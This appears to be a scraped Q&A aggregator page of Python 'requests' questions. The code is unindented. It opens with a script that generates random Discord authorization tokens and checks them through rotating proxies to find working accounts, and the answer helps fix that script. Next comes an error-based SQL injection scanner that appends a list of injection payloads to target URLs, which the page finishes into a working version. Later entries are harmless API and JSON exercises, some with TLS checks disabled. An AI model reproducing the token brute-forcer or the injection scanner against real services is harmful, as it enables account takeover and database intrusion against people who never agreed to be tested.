Error: proxy = next(proxy_pool) StopIteration

Error: proxy = next(proxy_pool) StopIteration - python

I am trying to run a script and it has a standard URL for proxies which allows the script to run fine. Once I add my own proxy URL I am getting the error Error: proxy = next(proxy_pool) StopIteration. My URL is in another file and I can also link that if needed.
Code is below, if anyone can help that would be great.
import string
import os
import requests
import proxygen
from itertools import cycle
import base64
from random import randint
N = input("How many tokens : ")
count = 0
current_path = os.path.dirname(os.path.realpath(__file__))
url = "https://discordapp.com/api/v6/users/#me/library"
while(int(count) < int(N)):
tokens = []
base64_string = "=="
while(base64_string.find("==") != -1):
sample_string = str(randint(000000000000000000, 999999999999999999))
sample_string_bytes = sample_string.encode("ascii")
base64_bytes = base64.b64encode(sample_string_bytes)
base64_string = base64_bytes.decode("ascii")
else:
token = base64_string+"."+random.choice(string.ascii_letters).upper()+''.join(random.choice(string.ascii_letters + string.digits)
for _ in range(5))+"."+''.join(random.choice(string.ascii_letters + string.digits) for _ in range(27))
count += 1
tokens.append(token)
proxies = proxygen.get_proxies()
proxy_pool = cycle(proxies)
for token in tokens:
proxy = next(proxy_pool)
header = {
"Content-Type": "application/json",
"authorization": token
}
try:
r = requests.get(url, headers=header, proxies={'https':"http://"+proxy})
print(r.text)
print(token)
if r.status_code == 200:
print(u"\u001b[32;1m[+] Token Works!\u001b[0m")
f = open(current_path+"/"+"workingtokens.txt", "a")
f.write(token+"\n")
elif "rate limited." in r.text:
print("[-] You are being rate limited.")
else:
print(u"\u001b[31m[-] Invalid Token.\u001b[0m")
except requests.exceptions.ProxyError:
print("BAD PROXY")
tokens.remove(token)
``

Try this code for get_proxies()
import requests
def get_proxies():
#in your example missing schema
url = 'https://proxy.link/list/get/5691264d3b19a600feef69dc3a27368d'
response = requests.get(url)
raw = response.text.split('\n')
proxies = set(raw)
return proxies
Output here

Related

Unable to remove new lines from list in python scanner

I am trying to create a simple error-based SQLI scanner that simply tacks on some common sqli payloads to the ends of query values in urls. I seem to have this working when providing a single url but I cannot get this to work properly when passing a file of urls. The lists of urls with the payloads come back but I have been unable to figure out how to remove the '\n' at the end of each url in the list so that I can request each url.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
from urllib.parse import urlparse, urlunparse, quote_plus
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
request_url = "\n".join(map(str,result))
request_url = quote_plus(request_url, safe='\n:/')
return request_url
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
appendPayload(url)
This returns a list like this:
['https://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%22\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B1%5D\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B%5D%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%60\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%211111%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27%7C%7C%27asd%27%7C%7C%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27+or+%271%27%3D%271\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211+or+1%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%27or%27%27%3D%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%271+or+1%3D%271']
After updating code, I am still having difficulty requesting each url properly:
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for
query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
# request_url = ",".join(map(str, result))
# result = [quote_plus(x, safe='\n:/') for x in result]
print(result)
return result
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
for url in urls:
request = requests.get(appendPayload(url))
This is returning:
requests.exceptions.InvalidSchema: No connection adapters were found for '["http://exampe.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1"\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[1]\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[]=1\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1`\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*!1111\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'||\'asd\'||\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\' or \'1\'=\'1", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1 or 1=1\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'or\'\'=\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'1 or 1=\'1"]'
Seems like it may have to do with some of the '' appearing in front of the https: in some of the lines
Update:
After much trying, I finally got this working the way I was looking for.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
import sys
import time
from urllib.parse import urlparse, urlunparse, quote_plus
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(data):
targets = []
encoded = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
for url in data:
parsed_url = urlparse(url)
url_queries = parsed_url.query.split("&")
for payload in payloads:
new_query = "&".join([ "{}{}".format(query, payload) for query in url_queries])
parsed = parsed_url._replace(query=new_query)
targets.append(urlunparse(parsed))
for target in targets:
encode = quote_plus(target, safe='\n:/')
encoded.append(encode)
return encoded
args = getArgs()
data = loadFile(args.list)
targets = appendPayload(data)
counter = 0
for target in targets:
counter += 1
print(f'\r{counter} Requests sent', end='', flush=True)
r = requests.get(target, verify=False)
if r.status_code == 500 or r.status_code == 302:
print(r.status_code, + " ", + target)

I want to import a text file with a list of IPs and Run it against my script

I have the following script working properly. It is to check IP information from netbox API. I would like to know what to add so I can import a list of IPs and run it against the script:
#!/bin/python3
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #Disable warning for SSL Error
ip_address = input("Enter the IP Address you want to search: ")
apiBaseUrl = "https://netbox.local/api"
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'Token 5c915999999998ad82112b3b5880199769894421' #Here you can add your own token
}
def get_hostInterfaceDescription(ip4):
resp = requests.get(apiBaseUrl + '/ipam/ip-addresses/?q=' + ip4,headers=headers,verify=False).json()
return resp['results'][0]["description"] #this gets the description information
try:
desc = get_hostInterfaceDescription(ip_address)
print("")
print("Description found in Netbox: " + desc)
except TypeError or IndexError:
print("Description Not found")
def get_hostInterfaceTenant(ip4):
resp = requests.get(apiBaseUrl + '/ipam/ip-addresses/?q=' + ip4,headers=headers,verify=False).json()
return resp['results'][0]["tenant"]["name"] #this gets the description information
try:
tenant = get_hostInterfaceTenant(ip_address)
print("")
print("Tenant found in Netbox: " + tenant)
except TypeError or IndexError:
print("Tenant Not found")
def get_hostInterfaceVRF(ip4):
resp = requests.get(apiBaseUrl + '/ipam/ip-addresses/?q=' + ip4, headers=headers, verify=False).json()
return resp['results'][0]["tenant"]["name"] # this gets the description information
try:
vrf = get_hostInterfaceVRF(ip_address)
print("")
print("VRF found in Netbox: " + vrf)
except TypeError or IndexError:
print("VRF Not Found")

Loading a text file and looping over its contents is simple in Python:
with open("ip_list.txt") as ip_list:
for address in ip_list:
address = address.strip() # remove trailing newline
do_something_with(address)
In your case, do_something_with might look like this:
def do_something_with(ip4):
try:
desc = get_hostInterfaceDescription(ip4)
...
except ...:
...
try:
tenant = get_hostInterfaceTenant(ip4)
...
except ...:
...
...

GET works, POST doesn't

I'm writing a small Python 2.x app which grabs images from URLs, converts them to base64, then submits them using requests to an API server as parameters of a POST request. My admittedly amateurish code is as follows:
import csv
import json
import requests
import base64
import getpass
f = raw_input("Enter CSV filename: ")
global clientCode
clientCode = raw_input("Enter customer code: ")
username = raw_input("Enter username: ")
password = getpass.getpass("Enter password: ")
global url
url = "https://" + clientCode + ".redacted.com/api"
def getSessionKey():
querystring = {"request":"verifyUser","username":username,"password":password,"clientCode":clientCode}
response = requests.request("GET", url, params=querystring, timeout=10)
jr = json.loads(response.text)
# print(response.text)
global sessionKey
sessionKey = jr['records'][0]['sessionKey']
errorCode = jr['status']['errorCode']
with open(f, 'rb') as myfile:
reader = csv.reader(myfile)
rownum = 0
getSessionKey()
for row in reader:
productID = row[0]
imageURL = row[1]
dlimage = requests.get(imageURL, stream=True, timeout=10)
encodedImage = base64.encodestring(dlimage.content)
imagequery = {'clientCode':clientCode,'sessionKey':sessionKey,'request':'saveProductPicture','productID':productID,'picture':encodedImage}
response = requests.post(url, data=imagequery, timeout=10)
print response.status_code
ir = json.loads(response.text)
errorCode = ir['status']['errorCode']
print errorCode
rownum = rownum + 1
Now, if I change the response line to response = requests.get(url, params=imagequery, timeout=10), it works. But since this is a GET request, the server throws an HTTP 414 error for any images larger than about 1kb. If I run the code as above, the API server gives an error which indicates it's not seeing the clientCode parameter, so it would stand to reason that it's not seeing any of the data. What am I doing wrong?
Thanks for helping me learn by doing.

I'm still not sure why requests was behaving the way it was, but I rewrote the code to use httplib instead, and it works.

python request urls parallel [duplicate]

This question already has an answer here:
How to send multiple http requests python
(1 answer)
Closed 6 years ago.
I created the following script to download images from an API endpoint which works as intended. Thing is that it is rather slow as all the requests have to wait on each other. What is the correct way to make it possible to still have the steps synchronously for each item I want to fetch, but make it parallel for each individual item. This from an online service called
servicem8
So what I hope to achieve is:
fetch all possible job ids => keep name/and other info
fetch name of the customer
fetch each attachment of a job
These three steps should be done for each job. So I could make things parallel for each job as they do not have to wait on each other.
Update:
Problem I do not understand is how can you make sure that you bundle for example the three calls per item in one call as its only per item that I can do things in parallel so for example when I want to
fetch item( fetch name => fetch description => fetch id)
so its the fetch item I want to make parallel?
The current code I have is working but rather slow:
import requests
import dateutil.parser
import shutil
import os
user = "test#test.com"
passw = "test"
print("Read json")
url = "https://api.servicem8.com/api_1.0/job.json"
r = requests.get(url, auth=(user, passw))
print("finished reading jobs.json file")
scheduled_jobs = []
if r.status_code == 200:
for item in r.json():
scheduled_date = item['job_is_scheduled_until_stamp']
try:
parsed_date = dateutil.parser.parse(scheduled_date)
if parsed_date.year == 2016:
if parsed_date.month == 10:
if parsed_date.day == 10:
url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item[
'company_uuid'])
c = requests.get(url_customer, auth=(user, passw))
cus_name = c.json()['name']
scheduled_jobs.append(
[item['uuid'], item['generated_job_id'], cus_name])
except ValueError:
pass
for job in scheduled_jobs:
print("fetch for job {}".format(job))
url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[
0])
r = requests.get(url, auth=(user, passw))
if r.json() == []:
pass
for attachment in r.json():
if attachment['active'] == 1 and attachment['file_type'] != '.pdf':
print("fetch for attachment {}".format(attachment))
url_staff = "https://api.servicem8.com/api_1.0/Staff.json?%24filter=uuid%20eq%20{}".format(
attachment['created_by_staff_uuid'])
s = requests.get(url_staff, auth=(user, passw))
for staff in s.json():
tech = "{}_{}".format(staff['first'], staff['last'])
url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment[
'uuid'])
r = requests.get(url, auth=(user, passw), stream=True)
if r.status_code == 200:
creation_date = dateutil.parser.parse(
attachment['timestamp']).strftime("%d.%m.%y")
if not os.path.exists(os.getcwd() + "/{}/{}".format(job[2], job[1])):
os.makedirs(os.getcwd() + "/{}/{}".format(job[2], job[1]))
path = os.getcwd() + "/{}/{}/SC -O {} {}{}".format(
job[2], job[1], creation_date, tech.upper(), attachment['file_type'])
print("writing file to path {}".format(path))
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
print(r.text)
Update [14/10]
I updated the code in the following way with some hints given. Thanks a lot for that. Only thing I could optimize I guess is the attachment downloading but it is working fine now. Funny thing I learned is that you cannot create a CON folder on a windows machine :-) did not know that.
I use pandas as well just to try to avoid some loops in my list of dicts but not sure if I am already most performant. Longest is actually reading in the full json files. I fully read them in as I could not find an API way of just telling the api, return me only the jobs from september 2016. The api query function seems to work on eq/lt/ht.
import requests
import dateutil.parser
import shutil
import os
import pandas as pd
user = ""
passw = ""
FOLDER = os.getcwd()
headers = {"Accept-Encoding": "gzip, deflate"}
import grequests
urls = [
'https://api.servicem8.com/api_1.0/job.json',
'https://api.servicem8.com/api_1.0/Attachment.json',
'https://api.servicem8.com/api_1.0/Staff.json',
'https://api.servicem8.com/api_1.0/Company.json'
]
#Create a set of unsent Requests:
print("Read json files")
rs = (grequests.get(u, auth=(user, passw), headers=headers) for u in urls)
#Send them all at the same time:
jobs,attachments,staffs,companies = grequests.map(rs)
#create dataframes
df_jobs = pd.DataFrame(jobs.json())
df_attachments = pd.DataFrame(attachments.json())
df_staffs = pd.DataFrame(staffs.json())
df_companies = pd.DataFrame(companies.json())
#url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item['company_uuid'])
#c = requests.get(url_customer, auth=(user, passw))
#url = "https://api.servicem8.com/api_1.0/job.json"
#jobs = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading attachments json")
#url = "https://api.servicem8.com/api_1.0/Attachment.json"
#attachments = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading staff.json")
#url_staff = "https://api.servicem8.com/api_1.0/Staff.json"
#staffs = requests.get(url_staff, auth=(user, passw))
scheduled_jobs = []
if jobs.status_code == 200:
print("finished reading json file")
for job in jobs.json():
scheduled_date = job['job_is_scheduled_until_stamp']
try:
parsed_date = dateutil.parser.parse(scheduled_date)
if parsed_date.year == 2016:
if parsed_date.month == 9:
cus_name = df_companies[df_companies.uuid == job['company_uuid']].iloc[0]['name'].upper()
cus_name = cus_name.replace('/', '')
scheduled_jobs.append([job['uuid'], job['generated_job_id'], cus_name])
except ValueError:
pass
print("{} jobs to fetch".format(len(scheduled_jobs)))
for job in scheduled_jobs:
print("fetch for job attachments {}".format(job))
#url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[0])
if attachments == []:
pass
for attachment in attachments.json():
if attachment['related_object_uuid'] == job[0]:
if attachment['active'] == 1 and attachment['file_type'] != '.pdf' and attachment['attachment_source'] != 'INVOICE_SIGNOFF':
for staff in staffs.json():
if staff['uuid'] == attachment['created_by_staff_uuid']:
tech = "{}_{}".format(
staff['first'].split()[-1].strip(), staff['last'])
creation_timestamp = dateutil.parser.parse(
attachment['timestamp'])
creation_date = creation_timestamp.strftime("%d.%m.%y")
creation_time = creation_timestamp.strftime("%H_%M_%S")
path = FOLDER + "/{}/{}/SC_-O_D{}_T{}_{}{}".format(
job[2], job[1], creation_date, creation_time, tech.upper(), attachment['file_type'])
# fetch attachment
if not os.path.isfile(path):
url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment[
'uuid'])
r = requests.get(url, auth=(user, passw), stream = True)
if r.status_code == 200:
if not os.path.exists(FOLDER + "/{}/{}".format(job[2], job[1])):
os.makedirs(
FOLDER + "/{}/{}".format(job[2], job[1]))
print("writing file to path {}".format(path))
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
print("file already exists")
else:
print(r.text)

General idea is to use asynchronous url requests and there is a python module named grequests for that-https://github.com/kennethreitz/grequests
From Documentation:
import grequests
urls = [
'http://www.heroku.com',
'http://python-tablib.org',
'http://httpbin.org',
'http://python-requests.org',
'http://fakedomain/',
'http://kennethreitz.com'
]
#Create a set of unsent Requests:
rs = (grequests.get(u) for u in urls)
#Send them all at the same time:
grequests.map(rs)
And the resopnse
[<Response [200]>, <Response [200]>, <Response [200]>, <Response [200]>, None, <Response [200]>]

Extracting data from dictionary returned by json.loads

Here is what I am trying to do: Prompt for an URL, read the JSON data from that URL using urllib and then parse and extract the comment counts from the JSON data and compute their sum.
Here is what I have so far in Python:
import json
import urllib
serviceurl = 'http://python-data.dr-chuck.net/comments_42.json'
while True:
url = serviceurl + urllib.urlencode(('sensor':'false', 'address' : address))
print "Retrieving", url
uh = urllib.urlopen(url)
data = uh.read()
print "Retrieved", len(data), "characters"
try: js = json.loads(str(data))
except: js = None
print js.dumps(js, indent = 4)
js = ["comment"][0]["count"]
lst = list()
lst.append(js)
print sum(lst)
Here is what the JSON data looks like:
{
comments: [
{
name: "Matthias"
count: 97
},
{
name: "Geomer"
count: 97
}
...
]
}
I am using Python 2. This is my first time doing this, so any feedback you can give me about this would be helpful, especially after the try/except statements. Thanks in advance.

js is a dictionary looking like this:
{'comments': [{'count': 97, 'name': 'Matthias'}, {'count': 97, 'name': 'Geomer'}]}
You can get the sum of all 'count' values like this:
sum(nested_dict['count'] for nested_dict in js['comments'])
If there is a chance that one of the dictionaries in the list does not have a 'count' key, use dict.get with default value 0:
sum(nested_dict.get('count', 0) for nested_dict in js['comments'])

I've also done the same course and was on the same assignment. The answer by timgeb will get the job done in a smaller code. Alternatively, you can also try the following:
import json
import urllib
counts = list()
inp = raw_input('Enter a URL: ')
url = urllib.urlopen(inp)
data = url.read()
print len(data)
try:
js = json.loads(data)
except:
js = None
comments = js['comments']
for comment in comments:
counts.append(comment['count'])
print sum(counts)
#print sum(nested_dict['count'] for nested_dict in js['comments'])
you dont need to encode anything to the url, nor do you need a while loop. that segment of the code was used for using the google map API.

My version of code:
import json
import urllib.request, urllib.parse, urllib.error
total = 0
url = input('Enter URL: ')
data = urllib.request.urlopen(url).read().decode()
info = json.loads(data)
number = info["comments"] #getting list of all the dictinaries
for i in number: #in each dictionary...
needed = i.get('count') #... we are getting numbers from "count"
total = total + int(needed) #summ all the numbers
print(total)

Based on Mudit Sahni's code, but written for Python3
import urllib.request
import json
url = input("Enter URL: ")
response = urllib.request.urlopen(urllib.request.Request(url)).read().decode('utf-8')
data = json.loads(response)
counts = list()
comments = data['comments']
for comment in comments:
counts.append(comment['count'])
print (sum(counts))

import urllib.request, urllib.parse, urllib.error
import json
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter - ')
print('Retrieving', url)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
info = json.loads(data)
#print(info) #to see the info dictionary/object
#print(json.dumps(info, indent=2))
count = 0
sum = 0
for item in info['comments']:
num = item['count']
sum = sum + int(num)
count = count + 1
print('Count: ', count)
print('Sum: ', sum)

## http://py4e-data.dr-chuck.net/comments_42.json total= 2553
## http://py4e-data.dr-chuck.net/comments_802780.json total= 2670
import ssl
import urllib.request, urllib.parse, urllib.error
import json
total= list()
## Ignore SSL certification
ctx= ssl.create_default_context
ctx.check_hostname= False
ctx.verify_mode= ssl.CERT_NONE
## Access url
url= input('Enter URL: ')
req= urllib.request.urlopen(url, context=ctx)
html= req.read().decode()
print('Retrieving URL:', url)
print('Retrieved', len(html),'characters')
##accessing data
js= json.loads(html)
#print(json.dumps(js, indent=3))
for counts in js["comments"]:
#print('Counts:', counts['count'])
total.append(counts['count'])
print(sum(total))

import urllib.request, urllib.parse, urllib.error
import ssl
import json
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
count = sum = 0
url = input('Enter location: ')
if len(url) < 1: break
print('Retrieving', url)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
print('Retrieved', len(data), 'characters')
info = json.loads(data)
for item in info['comments']:
count+=1
sum+=int(item['count'])
print('count:',count)
print('sum',sum)

from urllib.request import urlopen
import json
while True:
url = input('Enter url: ')
if len(url) < 1:
break
print("Retrieving", url)
uh = urlopen(url)
data = uh.read().decode()
print("Retrieved", len(data), "characters")
try:
js = json.loads(data)
except:
js = None
count = 0
lst = list()
for comment in js["comments"]:
count += 1
lst.append(comment["count"])
print("count:", count)
print(sum(lst))

import urllib.request, urllib.parse, urllib.error
import json
url = "http://py4e-data.dr-chuck.net/comments_1418532.json"
info = json.loads(urllib.request.urlopen(url).read())
comm=info['comments']
counts_list = [int(items['count']) for items in comm]
print(sum(counts_list))

import json
import urllib
url=raw_input('Enter location:')
print 'Retrieving',url
uh=urllib.urlopen(url)
data=uh.read()
info = json.loads(data)
print 'Retrieved', len(info)
sum=0
counts=0
for item in info['comments']:
sum=sum+item['count']
counts=counts+1
print 'Counts:',counts
print 'Sum:',sum

import urllib.request, urllib.parse, urllib.error
import ssl
import json
#to ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter - ')
data = urllib.request.urlopen(url, context=ctx).read()
info = json.loads(data)
sum_count = 0
for a in info["comments"]:
sum_count += int(a["count"])
print(sum)

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Error: proxy = next(proxy_pool) StopIteration - python

Try this code for get_proxies() import requests def get_proxies(): #in your example missing schema url = 'https://proxy.link/list/get/5691264d3b19a600feef69dc3a27368d' response = requests.get(url) raw = response.text.split('\n') proxies = set(raw) return proxies Output here

Related

Unable to remove new lines from list in python scanner

I want to import a text file with a list of IPs and Run it against my script

GET works, POST doesn't

python request urls parallel [duplicate]

Extracting data from dictionary returned by json.loads

Categories

Resources